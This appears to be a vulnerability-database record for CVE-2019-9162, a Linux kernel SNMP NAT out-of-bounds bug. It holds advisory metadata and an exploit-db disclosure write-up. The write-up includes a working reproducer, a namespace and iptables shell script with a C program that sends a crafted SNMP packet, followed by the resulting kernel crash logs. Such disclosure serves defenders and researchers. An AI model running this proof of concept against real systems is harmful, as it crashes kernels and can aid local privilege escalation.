{"id": "CVE-2019-9162", "bulletinFamily": "NVD", "title": "CVE-2019-9162", "description": "In the Linux kernel before 4.20.12, net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP NAT module has insufficient ASN.1 length checks (aka an array index error), making out-of-bounds read and write operations possible, leading to an OOPS or local privilege escalation. This affects snmp_version and snmp_helper.", "published": "2019-02-25T23:29:00", "modified": "2019-06-15T01:29:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9162", "reporter": "cve@mitre.org", "references": ["https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.20.12", "https://www.exploit-db.com/exploits/46477/", "http://www.securityfocus.com/bid/107159", "https://bugs.chromium.org/p/project-zero/issues/detail?id=1776", "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.25", "https://usn.ubuntu.com/3930-2/", "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c4c07b4d6fa1f11880eab8e076d3d060ef3f55fc", "https://security.netapp.com/advisory/ntap-20190327-0002/", "https://github.com/torvalds/linux/commit/c4c07b4d6fa1f11880eab8e076d3d060ef3f55fc", "https://usn.ubuntu.com/3930-1/", "https://support.f5.com/csp/article/K31864522"], "cvelist": ["CVE-2019-9162"], "type": "cve", "lastseen": "2021-02-02T07:13:06", "edition": 8, "viewCount": 71, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K31864522"]}, {"type": "exploitdb", "idList": ["EDB-ID:46477"]}, {"type": "zdt", "idList": ["1337DAY-ID-32291"]}, {"type": "fedora", "idList": ["FEDORA:E93AE6077DCD", "FEDORA:7723E6075F15", "FEDORA:9FFEF6014BBC", "FEDORA:20DCB60779B2"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3930-1.NASL", "FEDORA_2019-196AB64D65.NASL", "EULEROS_SA-2019-1532.NASL", "UBUNTU_USN-3930-2.NASL", "FEDORA_2019-7462ACF8BA.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875506", "OPENVAS:1361412562310843952", "OPENVAS:1361412562310843959", "OPENVAS:1361412562310875904", "OPENVAS:1361412562310876177", "OPENVAS:1361412562311220191532", "OPENVAS:1361412562310875505"]}, {"type": "ubuntu", "idList": ["USN-3930-2", "USN-3930-1"]}], "modified": "2021-02-02T07:13:06", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-02-02T07:13:06", "rev": 2}, "vulnersScore": 5.6}, "cpe": ["cpe:/a:netapp:element_software_management:-"], "affectedSoftware": [{"cpeName": "linux:linux_kernel", "name": "linux linux kernel", "operator": "lt", "version": "4.20.12"}, {"cpeName": "linux:linux_kernel", "name": "linux linux kernel", "operator": "lt", "version": "4.19.25"}, {"cpeName": "netapp:element_software_management", "name": "netapp element software management", "operator": "eq", "version": "-"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:netapp:element_software_management:-:*:*:*:*:*:*:*"], "cwe": ["CWE-129"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:netapp:element_software_management:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.20.12:*:*:*:*:*:*:*", "versionEndExcluding": "4.20.12", "versionStartIncluding": "4.20", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.19.25:*:*:*:*:*:*:*", "versionEndExcluding": "4.19.25", "versionStartIncluding": "4.19", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c4c07b4d6fa1f11880eab8e076d3d060ef3f55fc", "refsource": "MISC", "tags": ["Patch", "Mailing List", "Vendor Advisory"], "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c4c07b4d6fa1f11880eab8e076d3d060ef3f55fc"}, {"name": "https://support.f5.com/csp/article/K31864522", "refsource": "CONFIRM", "tags": [], "url": "https://support.f5.com/csp/article/K31864522"}, {"name": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.20.12", "refsource": "MISC", "tags": ["Mailing List", "Vendor Advisory"], "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.20.12"}, {"name": "46477", "refsource": "EXPLOIT-DB", "tags": ["Patch", "Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/46477/"}, {"name": "https://github.com/torvalds/linux/commit/c4c07b4d6fa1f11880eab8e076d3d060ef3f55fc", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/torvalds/linux/commit/c4c07b4d6fa1f11880eab8e076d3d060ef3f55fc"}, {"name": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1776", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit", "Issue Tracking"], "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1776"}, {"name": "USN-3930-1", "refsource": "UBUNTU", "tags": [], "url": "https://usn.ubuntu.com/3930-1/"}, {"name": "107159", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/107159"}, {"name": "USN-3930-2", "refsource": "UBUNTU", "tags": [], "url": "https://usn.ubuntu.com/3930-2/"}, {"name": "https://security.netapp.com/advisory/ntap-20190327-0002/", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://security.netapp.com/advisory/ntap-20190327-0002/"}, {"name": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.25", "refsource": "MISC", "tags": ["Mailing List", "Vendor Advisory"], "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.25"}], "immutableFields": []}

{"f5": [{"lastseen": "2020-04-06T22:39:56", "bulletinFamily": "software", "cvelist": ["CVE-2019-9162"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-06-15T01:07:00", "published": "2019-06-15T01:07:00", "id": "F5:K31864522", "href": "https://support.f5.com/csp/article/K31864522", "title": "Linux kernel vulnerability CVE-2019-9162", "type": "f5", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-03-01T16:24:45", "description": "", "published": "2019-03-01T00:00:00", "type": "exploitdb", "title": "Linux &lt; 4.14.103 / &lt; 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9162"], "modified": "2019-03-01T00:00:00", "id": "EDB-ID:46477", "href": "https://www.exploit-db.com/exploits/46477", "sourceData": "commit cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\",\r\nfirst in 4.16) changed the nf_nat_snmp_basic module (which, when enabled, parses\r\nand modifies the ASN.1-encoded payloads of SNMP messages) so that the kernel's\r\nASN.1 infrastructure is used instead of an open-coded parser. The common ASN.1\r\ndecoder can invoke callbacks when certain objects are encountered. The SNMP\r\nhelper has two such callbacks defined in nf_nat_snmp_basic.asn1:\r\n\r\n - For the `version` field of a `Message` (a `INTEGER`), snmp_version() is\r\n invoked.\r\n - For each `IpAddress` (according to RFC 1155, a 4-byte octet string),\r\n snmp_helper() is invoked.\r\n\r\nThese callbacks contain the following code:\r\n\r\n\r\nint snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n{\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n}\r\n\r\nint snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n{\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n __be32 *pdata = (__be32 *)data;\r\n\r\n if (*pdata == ctx->from) {\r\n pr_debug(\"%s: %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n\r\n if (*ctx->check)\r\n fast_csum(ctx, (unsigned char *)data - ctx->begin);\r\n *pdata = ctx->to;\r\n }\r\n\r\n return 1;\r\n}\r\n\r\n\r\nThe problem is that both of these callbacks can be invoked by the ASN.1 parser\r\nwith `data` pointing at the end of the packet and `datalen==0` (even though, for\r\nthe `INTEGER` type, X.690 says in section 8.3.1 that \"The contents octets shall\r\nconsist of one or more octets\"), but they don't check whether there is\r\nsufficient input available. This means that snmp_version() can read up to one\r\nbyte out-of-bounds and leak whether that byte was <=1, and snmp_helper() can\r\nread and potentially also write up to four bytes out-of-bounds.\r\n\r\nUnfortunately, KASAN can't detect the out-of-bounds reads because, as was\r\npointed out in\r\n<https://lore.kernel.org/lkml/552d49b6-1b6e-c320-b56a-a119e360f1d7@gmail.com/>\r\nregarding a (harmless) out-of-bounds read in the TCP input path, the kernel\r\nstores a `struct skb_shared_info` at the end of the socket buffer allocation,\r\ndirectly behind the packet data. The kernel can only detect that a problem\r\noccurred based on the later effects of an out-of-bounds write.\r\nIt might be a good idea to explicitly add some KASAN poison between the head\r\ndata and struct skb_shared_info to make it easier for kernel fuzzers to discover\r\nissues like this in the future.\r\n\r\n\r\nThere are two scenarios in which this bug might be attacked:\r\n\r\n - A router that performs NAT translation is explicitly set up to invoke the\r\n SNMP helper, and a device in the NATted network wants to attack the router.\r\n This is probably very rare, since the router would need to be explicitly\r\n configured to perform SNMP translation. On top of that, to corrupt memory,\r\n an attacker would need to be able to completely fill an SKB; it isn't clear\r\n to me whether that is possible remotely.\r\n - A local attacker could exploit the bug by setting up new network namespaces\r\n with an iptables configuration that invokes SNMP translation. This probably\r\n works as a local privilege escalation against some distribution kernels.\r\n The normal autoloading path for this code was only set up in\r\n commit 95c97998aa9f (\"netfilter: nf_nat_snmp_basic: add missing helper alias\r\n name\", first in 4.20), but from a glance, it looks like it would be possible\r\n on kernels before 4.20 to instead first load one of the openvswitch module's\r\n aliases \"net-pf-16-proto-16-family-ovs_*\" through ctrl_getfamily(), then use\r\n ovs_ct_add_helper() to trigger loading of \"nf_nat_snmp_basic\" through the\r\n alias \"ip_nat_snmp_basic\".\r\n\r\n\r\nThe following is a reproducer for a git master build that causes a kernel oops\r\n(nf_nat_snmp_basic must be compiled into the kernel, or built as a module, I\r\nthink):\r\n\r\n======================================================================\r\n#!/bin/sh\r\nunshare -mUrnp --mount-proc --fork bash <<SCRIPT_EOF\r\nset -e\r\nset -x\r\n\r\n# make \"ip netns\" work in here\r\nmount -t tmpfs none /var/run/\r\ncd /var/run\r\n\r\n# this namespace is the router with NAT\r\nip link set dev lo up\r\necho 1 > /proc/sys/net/ipv4/ip_forward\r\n/sbin/iptables -t nat -A POSTROUTING -o veth0 -j MASQUERADE\r\n/sbin/iptables -t raw -A PREROUTING -p udp --dport 162 -j CT --helper snmp_trap\r\n/sbin/iptables -A FORWARD -m conntrack --ctstate INVALID,NEW,RELATED,ESTABLISHED,SNAT,DNAT -m helper --helper snmp_trap -j ACCEPT\r\n\r\n# this namespace is the destination host for the SNMP trap message\r\nip netns add netns1\r\nnsenter --net=/var/run/netns/netns1 ip link set dev lo up\r\nip link add veth0 type veth peer name veth1\r\nip link set veth1 netns netns1\r\nnsenter --net=/var/run/netns/netns1 /sbin/ifconfig veth1 192.168.0.2/24 up\r\n/sbin/ifconfig veth0 192.168.0.1/24 up\r\n\r\n# this namespace sends the SNMP trap message\r\nip netns add netns2\r\nnsenter --net=/var/run/netns/netns2 ip link set dev lo up\r\nip link add veth2 type veth peer name veth3\r\nip link set veth3 netns netns2\r\n# /31 network, see RFC 3021\r\n# we want *.0.0.0 so that the 3 OOB bytes can be zero\r\nnsenter --net=/var/run/netns/netns2 /sbin/ifconfig veth3 10.0.0.0/31 up\r\n/sbin/ifconfig veth2 10.0.0.1/24 up\r\nnsenter --net=/var/run/netns/netns2 ip route add default via 10.0.0.1\r\n\r\n# debug\r\nip route\r\nnsenter --net=/var/run/netns/netns2 ip route\r\n\r\n# run the PoC\r\ncat > udp_repro.c <<C_EOF\r\n#define _GNU_SOURCE\r\n#include <arpa/inet.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <stdarg.h>\r\n#include <net/if.h>\r\n#include <linux/if.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <linux/in.h>\r\n#include <err.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n\r\n#define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24))\r\n\r\n// \"pc X\" comments in the following array refer to indices into\r\n// nf_nat_snmp_basic_machine in \"nf_nat_snmp_basic.asn1.c\", which\r\n// is generated as part of the kernel's build process.\r\n// reading the ASN.1 decoder and the generated machine opcodes\r\n// seemed easier than trying to build ASN.1 by looking at the\r\n// spec or something like that...\r\nuint8_t snmp_packet[] = {\r\n // pc 0: read tag, should match _tag(UNIV, CONS, SEQ) == 0x30\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // pc 2: read tag, should match _tag(UNIV, PRIM, INT) == 0x02\r\n // version number\r\n 0x02, 0x01,\r\n 0x00,\r\n\r\n // pc 5: read tag, should match _tag(UNIV, PRIM, OTS) == 0x04\r\n 0x04, 0x00,\r\n\r\n // pc 7: read tag, should match _tagn(CONT, CONS, 0) == 0xa0\r\n // selects GetRequest-PDU, length indef\r\n 0xa0, 0x80,\r\n\r\n // pc 34: read INT request-id\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 36: read INT error-status\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 38: read INT error-index\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 40: read seq VarBindList\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // pc 42: read seq VarBind\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // ptr 44: read tag, should match _tag(UNIV, PRIM, OID) == 0x06\r\n // ObjectName\r\n // (can use 0x82 as length to have two bytes of length following)\r\n // length chosen so that the end of packet data is directly\r\n // followed by the skb_shared_info, with the whole thing in a\r\n // kmalloc-512 slab.\r\n 0x06, 0x70,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n\r\n // ptr 46: read tag, should skip\r\n // ptr 48: read tag, should skip\r\n // ptr 50: read tag, should skip\r\n // ptr 52: read tag, should match _tagn(APPL, PRIM, 0) == 0x40\r\n // IpAddress\r\n // we could also use a length of zero, and the callback would still\r\n // be invoked, but we want control over the first byte so that we\r\n // can create a source IP match.\r\n 0x40, 0x01,\r\n // source IP 10.0.0.0\r\n 0x0a\r\n};\r\n\r\nvoid do_sendto(int sockfd, const void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen) {\r\n int res = sendto(sockfd, buf, len, flags, dest_addr, addrlen);\r\n if (res != len) {\r\n if (res == -1)\r\n err(1, \"send failed\");\r\n else\r\n errx(1, \"partial send?\");\r\n }\r\n}\r\n\r\nint main(void) {\r\n int sock = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sock == -1) err(1, \"socket\");\r\n\r\n struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(162), .sin_addr = { .s_addr = IPADDR(192,168,0,2) } };\r\n\r\n // __ip_append_data() overallocates by 15 bytes for some reason; cancel it out\r\n // by using CORK to first send 15 bytes short, then append the remaining 15 bytes\r\n do_sendto(sock, snmp_packet, sizeof(snmp_packet)-15, MSG_MORE, (struct sockaddr *)&sa, sizeof(sa));\r\n do_sendto(sock, ((char*)snmp_packet)+sizeof(snmp_packet)-15, 15, 0, (struct sockaddr *)&sa, sizeof(sa));\r\n}\r\nC_EOF\r\ngcc -o udp_repro udp_repro.c -Wall\r\nnsenter --net=/var/run/netns/netns2 ./udp_repro\r\nSCRIPT_EOF\r\n======================================================================\r\n\r\nCorresponding splat:\r\n\r\n======================================================================\r\n[ 260.101983] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.134983] LoadPin: vda1 (254:1): writable\r\n[ 260.135981] LoadPin: enforcement can be disabled.\r\n[ 260.137085] LoadPin: kernel-module pinned obj=\"/lib/modules/5.0.0-rc5/kernel/net/bpfilter/bpfilter.ko\" pid=1095 cmdline=\"/sbin/modprobe -q -- bpfilter\"\r\n[ 260.143100] bpfilter: Loaded bpfilter_umh pid 1096\r\n[ 260.171851] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.248339] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[ 260.250475] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[ 260.261136] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.347678] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[ 260.621924] page:ffffea000703de00 count:0 mapcount:-128 mapping:0000000000000000 index:0x0\r\n[ 260.624264] flags: 0x17fffc000000000()\r\n[ 260.625373] raw: 017fffc000000000 ffffea0007a6d408 ffffea000783fe08 0000000000000000\r\n[ 260.627650] raw: 0000000000000000 0000000000000003 00000000ffffff7f 0000000000000000\r\n[ 260.629926] page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)\r\n[ 260.631958] ------------[ cut here ]------------\r\n[ 260.633312] kernel BUG at ./include/linux/mm.h:546!\r\n[ 260.634771] invalid opcode: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN\r\n[ 260.636693] CPU: 6 PID: 1121 Comm: udp_repro Not tainted 5.0.0-rc5 #263\r\n[ 260.638583] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 260.641031] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.642266] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.647667] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.649556] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.651639] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.653712] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.655786] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.657857] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78\r\n[ 260.659939] FS: 0000000000000000(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.662281] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.664171] CR2: 00007fe2da7af5e0 CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.666987] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 260.670022] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.672035] Call Trace:\r\n[ 260.672761] ? release_task+0x860/0x860\r\n[ 260.673864] ? __fd_install+0x88/0x140\r\n[ 260.674946] ? handle_mm_fault+0x82/0x130\r\n[ 260.676100] do_group_exit+0x79/0x120\r\n[ 260.677157] __x64_sys_exit_group+0x28/0x30\r\n[ 260.678362] do_syscall_64+0x73/0x160\r\n[ 260.679440] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 260.680878] RIP: 0033:0x7fe2da7af618\r\n[ 260.681922] Code: Bad RIP value.\r\n[ 260.682872] RSP: 002b:00007ffd5a5e12c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\r\n[ 260.685057] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe2da7af618\r\n[ 260.687125] RDX: 0000000000000000 RSI: 000000000000003c RDI: 0000000000000000\r\n[ 260.689197] RBP: 00007fe2daa8c8e0 R08: 00000000000000e7 R09: ffffffffffffff98\r\n[ 260.691264] R10: 00007ffd5a5e1248 R11: 0000000000000246 R12: 00007fe2daa8c8e0\r\n[ 260.693343] R13: 00007fe2daa91c20 R14: 0000000000000000 R15: 0000000000000000\r\n[ 260.695412] Modules linked in: bpfilter\r\n[ 260.696776] ---[ end trace d5f4a4a31d762416 ]---\r\n[ 260.698931] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.700171] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.705625] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.707183] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.708823] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.710384] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.711888] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.713785] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78\r\n[ 260.715326] FS: 00007fe2dac99700(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.717071] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.718340] CR2: 00007fe2da7af5ee CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.719867] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 260.721389] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.722923] Fixing recursive fault but reboot is needed!\r\n======================================================================\r\n\r\n\r\nIt also works against a Debian testing distro kernel if you first (as root)\r\nset kernel.unprivileged_userns_clone=1 and modprobe nf_nat_snmp_basic; splat:\r\n\r\n======================================================================\r\n[17260.886470] IPv6: ADDRCONF(NETDEV_UP): veth1: link is not ready\r\n[17260.887304] IPv6: ADDRCONF(NETDEV_UP): veth0: link is not ready\r\n[17260.887310] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[17260.887334] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[17260.930188] IPv6: ADDRCONF(NETDEV_UP): veth3: link is not ready\r\n[17260.931286] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[17261.115583] BUG: Bad page state in process Xorg pfn:276500\r\n[17261.115588] page:ffffcf4ac9d94000 count:-1 mapcount:0 mapping:0000000000000000 index:0x0\r\n[17261.115595] flags: 0x17fffc000000000()\r\n[17261.115598] raw: 017fffc000000000 dead000000000100 dead000000000200 0000000000000000\r\n[17261.115599] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000\r\n[17261.115601] page dumped because: nonzero _count\r\n[17261.115602] Modules linked in: veth xt_helper xt_conntrack nf_nat_snmp_basic nf_conntrack_snmp nf_conntrack_broadcast xt_CT xt_tcpudp nft_counter nft_chain_nat_ipv4 ipt_MASQUERADE nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nft_compat nf_tables nfnetlink uinput atm netrom appletalk psnap llc ax25 snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer joydev qxl snd soundcore ttm drm_kms_helper drm sg evdev virtio_balloon serio_raw virtio_console crct10dif_pclmul crc32_pclmul pcspkr ghash_clmulni_intel button ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto ecb btrfs xor zstd_decompress zstd_compress xxhash hid_generic usbhid hid raid6_pq libcrc32c crc32c_generic sr_mod cdrom ata_generic virtio_net net_failover virtio_blk failover crc32c_intel\r\n[17261.115641] ata_piix libata ehci_pci aesni_intel uhci_hcd aes_x86_64 ehci_hcd crypto_simd cryptd virtio_pci usbcore scsi_mod psmouse glue_helper virtio_ring i2c_piix4 usb_common virtio floppy\r\n[17261.115652] CPU: 14 PID: 653 Comm: Xorg Not tainted 4.19.0-1-amd64 #1 Debian 4.19.12-1\r\n[17261.115653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[17261.115654] Call Trace:\r\n[17261.115681] dump_stack+0x5c/0x80\r\n[17261.115688] bad_page.cold.115+0x7f/0xb2\r\n[17261.115690] get_page_from_freelist+0xf51/0x1200\r\n[17261.115694] ? reservation_object_reserve_shared+0x32/0x70\r\n[17261.115696] ? get_page_from_freelist+0x8c3/0x1200\r\n[17261.115698] __alloc_pages_nodemask+0x112/0x2b0\r\n[17261.115703] new_slab+0x288/0x6e0\r\n[17261.115707] ? update_blocked_averages+0x3ca/0x560\r\n[17261.115708] ___slab_alloc+0x378/0x500\r\n[17261.115710] ? update_nohz_stats+0x41/0x50\r\n[17261.115713] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115715] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115716] __slab_alloc+0x1c/0x30\r\n[17261.115717] kmem_cache_alloc+0x192/0x1c0\r\n[17261.115719] shmem_alloc_inode+0x16/0x30\r\n[17261.115722] alloc_inode+0x1b/0x80\r\n[17261.115725] new_inode_pseudo+0xc/0x60\r\n[17261.115726] new_inode+0x12/0x30\r\n[17261.115728] shmem_get_inode+0x49/0x220\r\n[17261.115731] __shmem_file_setup.part.42+0x3f/0x130\r\n[17261.115754] drm_gem_object_init+0x26/0x40 [drm]\r\n[17261.115758] qxl_bo_create+0x79/0x170 [qxl]\r\n[17261.115762] qxl_gem_object_create+0x60/0x120 [qxl]\r\n[17261.115764] ? qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115767] qxl_gem_object_create_with_handle+0x4e/0xb0 [qxl]\r\n[17261.115769] qxl_alloc_ioctl+0x42/0xa0 [qxl]\r\n[17261.115777] ? drm_dev_enter+0x19/0x50 [drm]\r\n[17261.115785] drm_ioctl_kernel+0xa1/0xf0 [drm]\r\n[17261.115807] drm_ioctl+0x1fc/0x390 [drm]\r\n[17261.115810] ? qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115812] ? ep_scan_ready_list.constprop.22+0x1fc/0x220\r\n[17261.115814] ? __hrtimer_init+0xb0/0xb0\r\n[17261.115816] ? timerqueue_add+0x52/0x80\r\n[17261.115834] ? enqueue_hrtimer+0x38/0x90\r\n[17261.115835] ? hrtimer_start_range_ns+0x1b7/0x2c0\r\n[17261.115836] do_vfs_ioctl+0xa4/0x630\r\n[17261.115840] ? __sys_recvmsg+0x83/0xa0\r\n[17261.115841] ksys_ioctl+0x60/0x90\r\n[17261.115843] __x64_sys_ioctl+0x16/0x20\r\n[17261.115846] do_syscall_64+0x53/0x100\r\n[17261.115851] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[17261.115852] RIP: 0033:0x7fb3e93d3747\r\n[17261.115854] Code: 00 00 90 48 8b 05 49 a7 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 